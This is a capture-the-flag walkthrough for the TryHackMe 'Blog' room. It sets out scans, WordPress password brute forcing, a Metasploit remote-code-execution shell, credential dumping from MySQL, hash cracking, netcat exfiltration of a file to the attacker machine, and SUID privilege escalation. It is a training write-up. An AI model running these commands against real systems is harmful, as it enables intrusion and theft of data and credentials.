# Blog

**Room Link:** <https://tryhackme.com/room/blog>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FCWTf7kCyvrGKyCAZtTU1%2Fimage.png?alt=media&#x26;token=20c4fc85-0241-44da-b489-e91ba68e0a8c" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FDUa4NBjq0YxlDMgp8IBG%2Fimage.png?alt=media&#x26;token=7d8675f0-0fa8-4d7f-af78-7aaafb7d7678" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FLQ47QyeCuhNhgYwRPAdc%2Fimage.png?alt=media&#x26;token=62437d3c-72ba-444d-93f9-beb4e573599f" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F71eJ2zwmlg91Ag7aza96%2Fimage.png?alt=media&#x26;token=ddd6118e-45fd-4ad2-bd5d-75bf814d84d4" alt=""><figcaption></figcaption></figure>

## TCP/445 - SMB

**Kali**

```
smbclient -L //$VICTIM/
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FYXMojZ9i7gIpdtFkDv8t%2Fimage.png?alt=media&#x26;token=b0b621cf-7941-4e42-a8cd-b4e371a5b211" alt=""><figcaption></figcaption></figure>

**Kali**

```
smbclient //$VICTIM/BillySMB
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FVzRwfwRRLKnpRVLzsoRX%2Fimage.png?alt=media&#x26;token=3521e91b-8143-4959-b93d-8ed724aba213" alt=""><figcaption></figcaption></figure>

**Kali**

```
smbget -R smb://$VICTIM/BillySMB
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fi8mWOuGv32wXWmSqNJly%2Fimage.png?alt=media&#x26;token=ba5bdeff-c277-4a4b-b9d2-7ad898b494a7" alt=""><figcaption></figcaption></figure>

**Kali**

```
steghide extract -sf check-this.png 
cat rabbit_hole.txt 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2F4bxV7QQnNhVXqntXYld4%2Fimage.png?alt=media&#x26;token=f43e2ccd-f311-425f-9b25-9dd63992a61d" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

If you go to http\://$VICTIM/wp-admin the page redirects to a new page so I add blog.thm into my hosts file and then it worked.

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FQutHjInUgurDDNCtH31h%2Fimage.png?alt=media&#x26;token=5d358e22-9742-4f3a-ab45-7530e21f6bcd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fihx2gbcdewOHIuBZMWkP%2Fimage.png?alt=media&#x26;token=fe293c73-3cf8-45ad-a559-df84a7f4928b" alt=""><figcaption></figcaption></figure>

**Kali**

```
wpscan --url http://blog.thm/ --enumerate u
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FwbNm5GW768HeAkQJdTvR%2Fimage.png?alt=media&#x26;token=380bd134-8756-4508-89a6-f342ac8925a8" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsEguFXrk1r3FD5gAQIoV%2Fimage.png?alt=media&#x26;token=900169d5-5fb4-4ee5-9931-6edaaa002dc0" alt=""><figcaption></figcaption></figure>

Hydra was taking too long but wpscan was able to find it quickly.

**Kali**

```
wpscan --url http://blog.thm/ -U kwheel, bjoel -P /usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FjeHgfFWLxe82Ug5PR6fe%2Fimage.png?alt=media&#x26;token=2eb0bf1e-cf16-40a1-97a9-9ca39064cfb6" alt=""><figcaption></figcaption></figure>

After logging in the user couldn't really do anything but I noticed wordpress is on version 5.0

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FhwKzU6TwEO0NxRSFV0vE%2Fimage.png?alt=media&#x26;token=2928d000-75d0-4228-a593-5168b95a6920" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Kali**

```
msfconsole
use exploit/multi/http/wp_crop_rce
set rhosts $VICTIM
set username kwheel
set password cutiepie1
run
shell
python2 -c 'import pty; pty.spawn("/bin/bash")'
id
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FkG1J45gBWa5cjIQPMImC%2Fimage.png?alt=media&#x26;token=864b6a15-9a4f-4e1d-9cec-d2b0e1253d7d" alt=""><figcaption></figcaption></figure>

**Victim**

```
grep -i pass *
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FswCvOvmnzDNqE2vc9KLQ%2Fimage.png?alt=media&#x26;token=f7d7cacf-488e-4feb-97f6-fe751816c544" alt=""><figcaption></figcaption></figure>

**Victim**

```
mysql -u wordpressuser -p
Password: LittleYellowLamp90!@
show databases;
use blog;
show tables;
select * from wp_users;
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FONYFL8VkrHe0y4NErvoi%2Fimage.png?alt=media&#x26;token=f86827cf-c86f-426f-898b-af2e1490f370" alt=""><figcaption></figcaption></figure>

Tried brute forcing the hashes, we got the password for kwheel again but they aren't a user on the actual server. bjoel I wasn't able to bruteforce.

**Kali**

```
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FUvCFild4f3WTBAakHdX9%2Fimage.png?alt=media&#x26;token=605cc307-1684-4e7c-bb28-3d08027c3713" alt=""><figcaption></figcaption></figure>

Found a pdf in bjoels home directory, after opening it up it looks like he was fired so his account is most likely locked anyways so there may be no point trying to break into it.

**Kali(receiving)**

```
cd /home/bjoel
nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf
```

**Victim(sending)**

```
nc -w 3 $KALI 1234 < Billy_Joel_Termination_May20-2020.pdf
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXHOOcPhmKLsgI0FQq819%2Fimage.png?alt=media&#x26;token=32e86551-4123-4626-b134-da2065959894" alt=""><figcaption></figcaption></figure>

## **Privilege Escalation**

**Victim**

```
find / -perm -u=s -type f 2> /dev/null 
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FsGgcm7684PCrOPvoo13a%2Fimage.png?alt=media&#x26;token=44924d56-943a-4ead-9968-1f35462c10f1" alt=""><figcaption></figcaption></figure>

This script seems to just check if there is a admin environment variable is set, if it isn't it will exit.

**Victim**

```
cd /usr/sbin
ltrace checker
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FEqo1SiOBPaGTXSL6VsNe%2Fimage.png?alt=media&#x26;token=bb02b79f-be60-4aa6-be59-cd80293fd891" alt=""><figcaption></figcaption></figure>

I add the admin environment variable then right away I got root after running the script

**Victim**

```
env
export admin=admin
env
/usr/sbin/checker
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fufp7rDZbVZLTaenjHsep%2Fimage.png?alt=media&#x26;token=4a1234bf-2ba9-4157-b67a-5783faae6d38" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FLJ8JAGe449PzbYzIwLMM%2Fimage.png?alt=media&#x26;token=133fe908-edd8-4e15-8b66-8bd62440e02e" alt=""><figcaption></figcaption></figure>
